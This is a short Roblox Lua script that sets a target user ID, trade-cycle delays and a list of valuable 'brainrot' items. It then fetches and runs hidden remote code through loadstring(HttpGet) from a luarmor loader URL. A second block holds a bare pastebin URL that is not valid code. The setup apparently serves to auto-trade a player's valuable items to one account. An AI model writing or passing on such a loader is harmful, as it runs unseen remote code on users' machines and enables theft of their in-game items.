getgenv().SECRET_KEY = "mrr_0b7fc9421fd440d5b230761d8d2df809"
getgenv().TARGET_ID = 9202969905
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Garama and Madundung"] = true,
    ["Dragon Cannelloni"] = true,
    ["Strawberry Elephant"] = true,
    ["Headless Horseman"] = true,
    ["Cerberus"] = true,
    ["Love Love Bear"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Tang Tang Keletang"] = true,
    ["Capitano Moby"] = true,
    ["Tictac Sahur"] = true,
    ["Ketupat Kepat"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
https://pastebin.com/Ja2QbWme
end)
